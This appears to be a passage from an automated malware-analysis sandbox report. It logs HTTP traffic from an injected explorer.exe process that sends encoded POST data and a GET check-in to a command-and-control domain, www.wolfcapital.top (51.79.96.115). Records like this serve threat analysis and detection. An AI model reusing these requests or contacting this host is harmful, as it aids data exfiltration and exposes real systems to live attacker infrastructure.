                                                                                                                                                                                          16192.168.11.204973151.79.96.11580C:\Windows\explorer.exe
                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                          Aug 10, 2023 10:19:41.533492088 CEST602OUTPOST /aw8o/ HTTP/1.1
                                                                                                                                                                                          Host: www.wolfcapital.top
                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Origin: http://www.wolfcapital.top
                                                                                                                                                                                          Referer: http://www.wolfcapital.top/aw8o/
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 526
                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                                                                                                                                          Data Raw: 31 4e 4d 36 65 3d 34 4c 33 61 31 52 66 42 6b 4f 6d 66 72 43 42 73 57 30 38 71 77 76 74 31 33 42 78 2b 61 33 68 74 47 46 34 4e 2b 44 4c 32 38 38 58 49 4e 4b 77 76 33 36 49 50 51 47 33 69 59 48 53 31 7a 34 65 4d 63 57 45 5a 49 77 48 5a 79 7a 69 59 71 71 77 43 70 5a 4c 73 51 79 37 44 6e 48 75 35 2f 61 38 49 33 6d 36 78 77 6b 4e 67 58 6a 66 4d 6e 73 59 6f 55 6a 69 4d 69 4a 38 63 37 2b 47 44 62 78 47 70 42 4e 71 6f 46 5a 36 76 45 7a 57 49 65 34 36 4c 30 79 53 74 42 35 42 4b 59 71 70 71 77 71 67 55 79 75 69 6b 38 46 77 36 6b 37 7a 48 68 6f 51 61 6b 4a 61 33 74 77 39 2b 53 30 36 6f 56 4e 31 55 43 34 63 47 76 52 6c 4a 31 64 71 69 77 54 39 72 59 32 77 71 4e 4c 61 51 37 73 4c 70 45 4e 47 77 50 78 66 54 44 73 71 76 51 4f 4d 4f 44 50 34 44 67 43 4f 45 30 6b 58 58 6b 39 32 61 7a 55 33 58 4f 4e 56 6d 48 61 42 79 65 4b 6f 57 70 66 69 74 71 42 68 54 59 2b 37 52 56 42 4c 37 72 39 6d 66 63 31 33 50 58 55 79 54 46 43 4e 59 75 41 6f 5a 56 34 70 33 64 43 57 43 32 30 42 34 53 54 33 42 78 4e 6d 4c 56 63 75 75 50 72 31 31 6f 44 73 69 77 69 33 35 72 52 5a 59 6b 79 69 59 42 61 71 58 6e 6b 76 45 36 51 42 66 65 59 43 30 38 53 51 4d 77 36 31 4e 68 4d 48 5a 69 42 56 57 2b 31 6d 33 32 30 58 74 72 53 53 50 4d 31 36 50 61 75 62 52 43 69 4e 30 4e 70 4f 79 48 78 30 57 4e 61 6c 79 52 6b 6f 45 70 2b 49 73 58 4b 77 47 57 50 74 42 57 74 47 64 7a 78 65 61 4f 62 57 68 73 77 49 35 73 6b 64 4a 38 68 67 33 57 34 51 6d 69 36 51 64 47 31 55 56 2f 41 41 30 36 41 77 62 55 55 70 37 73 65 76 46 71 37 39 2f 4e 38 35 49 65 55 6d 35 74 65 76 2f 42 48 4c 7a 33 66 4f 30 73 52 50 43 33 35 75 37 77 4a 30 3d
                                                                                                                                                                                          Data Ascii: 1NM6e=4L3a1RfBkOmfrCBsW08qwvt13Bx+a3htGF4N+DL288XINKwv36IPQG3iYHS1z4eMcWEZIwHZyziYqqwCpZLsQy7DnHu5/a8I3m6xwkNgXjfMnsYoUjiMiJ8c7+GDbxGpBNqoFZ6vEzWIe46L0yStB5BKYqpqwqgUyuik8Fw6k7zHhoQakJa3tw9+S06oVN1UC4cGvRlJ1dqiwT9rY2wqNLaQ7sLpENGwPxfTDsqvQOMODP4DgCOE0kXXk92azU3XONVmHaByeKoWpfitqBhTY+7RVBL7r9mfc13PXUyTFCNYuAoZV4p3dCWC20B4ST3BxNmLVcuuPr11oDsiwi35rRZYkyiYBaqXnkvE6QBfeYC08SQMw61NhMHZiBVW+1m320XtrSSPM16PaubRCiN0NpOyHx0WNalyRkoEp+IsXKwGWPtBWtGdzxeaObWhswI5skdJ8hg3W4Qmi6QdG1UV/AA06AwbUUp7sevFq79/N85IeUm5tev/BHLz3fO0sRPC35u7wJ0=
                                                                                                                                                                                          Aug 10, 2023 10:19:41.631089926 CEST603INHTTP/1.1 404 Not Found
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                          pragma: no-cache
                                                                                                                                                                                          content-type: text/html
                                                                                                                                                                                          content-length: 708
                                                                                                                                                                                          date: Thu, 10 Aug 2023 08:19:41 GMT
                                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                          17192.168.11.204973251.79.96.11580C:\Windows\explorer.exe
                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                          Aug 10, 2023 10:19:44.149688005 CEST616OUTPOST /aw8o/ HTTP/1.1
                                                                                                                                                                                          Host: www.wolfcapital.top
                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Origin: http://www.wolfcapital.top
                                                                                                                                                                                          Referer: http://www.wolfcapital.top/aw8o/
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 52914
                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                                                                                                                                          Data Raw: 31 4e 4d 36 65 3d 34 4c 33 61 31 52 66 42 6b 4f 6d 66 72 43 42 73 57 30 38 71 77 76 74 31 33 42 78 2b 61 33 68 74 47 46 34 4e 2b 44 4c 32 38 38 66 49 4e 34 49 76 32 5a 67 50 52 47 33 69 62 48 53 30 7a 34 66 4f 63 57 63 6e 49 77 62 4a 79 31 6d 59 71 35 6b 43 70 72 6a 73 48 79 37 43 69 48 75 37 37 61 38 63 33 6d 48 79 77 6b 5a 61 58 54 44 4d 6d 75 41 6f 43 45 2b 4c 71 35 38 57 37 2b 47 66 66 78 47 58 42 4e 75 43 46 5a 6d 76 45 78 53 49 4d 61 79 4c 34 42 4b 74 56 35 42 4a 52 4b 70 6c 35 4b 67 74 79 75 32 4b 38 46 77 71 6b 36 33 48 68 75 63 61 6e 49 61 30 74 51 39 2b 59 55 36 72 52 4e 35 51 43 34 41 65 76 51 52 4a 31 66 71 69 78 7a 39 72 64 53 63 72 45 4c 61 4b 73 38 4c 2b 41 4e 4b 34 50 78 61 67 44 6f 36 76 51 2f 6f 4f 41 64 51 44 7a 78 57 45 7a 30 58 52 72 64 32 4e 36 30 33 4c 4f 4e 46 4d 48 5a 4a 69 65 4e 77 57 37 4f 43 74 36 7a 4a 51 66 65 36 61 4a 52 4c 75 76 39 69 44 63 31 6e 74 58 55 7a 55 46 48 31 59 70 77 34 5a 61 64 64 77 5a 53 57 42 35 55 42 68 62 7a 4c 4c 78 4e 71 44 56 64 6d 2b 50 70 5a 31 70 6a 73 69 69 56 4c 36 6a 68 5a 66 73 53 69 47 4c 36 71 36 6e 6b 6a 6d 36 53 73 39 66 6f 75 30 39 69 67 4d 6a 61 31 4f 72 4d 48 46 6f 68 56 55 36 31 6d 33 32 30 54 35 72 53 75 50 5a 58 71 50 59 65 72 52 4a 56 5a 30 50 70 50 37 48 78 30 4c 4e 61 70 42 52 6b 67 2b 70 2b 55 47 58 49 63 47 57 64 56 42 43 4a 53 65 32 42 65 44 5a 37 57 36 6f 77 4e 35 73 67 39 42 38 68 51 4e 57 4c 6b 6d 6a 36 41 64 51 46 55 55 36 67 41 75 71 67 78 44 51 55 30 71 73 61 33 37 71 36 35 52 4e 37 4e 49 66 53 4c 44 2b 2f 6a 69 63 78 66 6c 31 49 6d 35 6c 43 48 65 6e 70 65 42 72 35 43 30 66 7a 34 59 4c 33 51 78 35 35 4b 62 47 48 6c 72 36 42 78 4e 2f 55 39 43 65 73 36 4a 4a 47 61 58 4a 6b 32 56 43 77 65 72 32 44 69 36 71 64 37 39 63 74 77 53 65 79 70 36 34 38 45 58 4c 54 7a 37 54 38 31 35 6e 42 44 56 36 71 45 53 63 76 4f 39 6e 77 5a 42 54 43 62 4a 6a 4e 48 37 46 73 71 62 54 6b 59 58 77 68 56 42 55 6b 56 52 35 39 4b 52 4b 54 75 7a 59 62 6d 68 46 45 57 61 63 48 48 62 4c 4d 58 72 37 68 56 59 43 75 31 45 56 57 39 55 4a 69 76 73 2f 6a 54 4a 37 6d 73 50 72 43 33 6a 76 30 72 49 51 31 55 73 55 77 74 65 37 43 76 6b 68 4a 65 31 74 41 55 71 66 43 34 4b 47 59 58 54 2b 34 31 32 59 51 62 73 53 32 46 35 4c 74 63 52 4f 55 62 4c 45 75 51 32 48 35 70 4b 41 75 41 58 31 50 58 33 58 48 43 61 78 56 30 34 64 2b 67 4a 58 76 30 41 76 57 6b 67 4e 31 61 38 68 7a 74 6d 4e 64 33 71 69 62 73 74 72 36 49 46 6c 66 30 6a 63 64 34 2f 57 4f 32 30 79 58 70 71 62 55 76 51 4e 34 50 54 69 34 4a 5a 54 64 54 70 31 79 37 71 59 50 74 41 46 77 45 49 78 5a 78 77 4f 54 62 55 67 52 4d 2f 72 33 78 7a 65 2b 6c 37 34 6a 77 54 52 45 6c 52 4d 42 62 58 57 54 47 59 71 45 41 6d 34 55 71 41 4d 55 59 36 45 2b 6f 69 61 6b 66 6e 7a 73 31 56 78 7a 4f 4f 45 4b 45 52 47 50 51 6c 73 56 54 52 63 56 58 61 41 77 37 32 31 45 74 78 49 65 54 62 4d 52 37 79 56 5a 2b 76 4f 2b 55 78 68 53 79 6d 30 31 6b 6f 63 56 4b 54 54 35 36 64 36 52 56 4c 52 6f 47 2b 63 70 41 54 71 55 55 2f 33 74 44 7a 52 58 54 42 62 58 46 75 33 35 58 6c 4c 77 79 4d 65 35 68 51 45 77 51 36 6a 32 6d 2b 62 41 7a 47 59 69 38 4b 53 35 42 65 41 71 59 6b 33 35 78 72 4a 56 56 73 53 34 6a 6a 6e 65 51 4a 43 46 39 58 55 79 54 5a 4c 79 49 31 2b 33 48 2f 57 41 33 38 33 6e 2f 45 4a 42 43 79 39 52 46 41 34 7a 78 74 34 6d 47 38 78 71 59 46 6d 73 77 6b 76 6f 55 67 51 69 45 47 78 31 61 76 2b 7a 53 49 31 4c 43 4f 2b 61 76 64 4e 6b 53 65 71 46 6c 51 62 4c 38 6d 65 72 4c 55 6c 64 38 4d 4d 53 37 69 68 4c 42 59 4c 36 31 74 62 51 53 44 37 63 50 67 4a 66 6f 4f 6b 56 31 67 43 58 44 31 6d 6e 64 70 4e 6b 62 2f 4b 56 67 5a 58 4f 34 51 6b 59 4b 38 6d 34 33 38 69 56 6a 46 41 6f 79 63 42 45 55 54 58 2b 6a 6c 4f 73 50 30 74 39 31 36 64 34 6f 59 67 68 33 6a 41 39 38 2f 38 44 66 43 77 44 7a 30 55 59 4d 78 57 59 73 73 52 58 44 45 41 7a 45 68 78 69 51 36 31 75 49 4d 53 74 53 68 69 59 48 43 53 46 63 41 4c 53 67 63 48 75 66 53 34 50 68 4c 4c 30 4c 69 53 63 4d 59 6e 78 46 59 32 4e 77 51 64 6e 4c 6e 45 54 6c 46 6b 64 71 36 58 55 6b 4d 47 74 7a 43 49 44 45 4f 6f 78 6e 71 32 73 4a 76 36 56 44 64 2b 45 47 64 37 46 4d 4b 4b 6b 46 63 35 76 7a 5a 42 46 6b 72 62 79 65 54 63 59 48 63 39 42 31 4d 44
                                                                                                                                                                                          Data Ascii: 1NM6e=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
                                                                                                                                                                                          Aug 10, 2023 10:19:44.245330095 CEST617INHTTP/1.1 404 Not Found
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                          pragma: no-cache
                                                                                                                                                                                          content-type: text/html
                                                                                                                                                                                          content-length: 708
                                                                                                                                                                                          date: Thu, 10 Aug 2023 08:19:44 GMT
                                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
                                                                                                                                                                                          Aug 10, 2023 10:19:44.245374918 CEST619OUTData Raw: 33 49 57 54 33 6c 6c 46 44 76 6a 4c 64 6a 50 47 37 44 77 6e 31 45 35 4e 70 6f 67 75 51 76 54 6a 30 30 33 2f 42 4f 7a 42 70 71 72 64 65 42 42 31 32 57 72 30 4e 39 35 4a 6e 64 50 4f 38 79 6a 78 7a 57 74 50 70 35 6f 51 63 71 50 65 62 74 4f 32 61 42
                                                                                                                                                                                          Data Ascii: 3IWT3llFDvjLdjPG7Dwn1E5NpoguQvTj003/BOzBpqrdeBB12Wr0N95JndPO8yjxzWtPp5oQcqPebtO2aB8guivpKoGiYCjvVjuesvCXxTGC7EPndByH0KEx8/sHfCybf8uvw/W8ssy23oFu2m6akVJTBPPEmqdiyvCuWHbxZYo1bj0EHqCUG+UiPxyfSYEEpycAozfFwzzUbSqgzQqjn3v/wFrx7Oiqj3Tv3DUqBzW7S/ivbJ1


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                          18192.168.11.204973351.79.96.11580C:\Windows\explorer.exe
                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                          Aug 10, 2023 10:19:46.770226002 CEST621OUTGET /aw8o/?P4=_n5TPHiTKZj&1NM6e=1Jf62kTrmMrtvW9nTGcQzL1qxjpfbwlqHSE5+yviuOiwQb8X0elvNWjLUSKlufaHfU8RKiOE6AarqIMWhrvJVzj6gCO1stp4zw== HTTP/1.1
                                                                                                                                                                                          Host: www.wolfcapital.top
                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          Connection: close
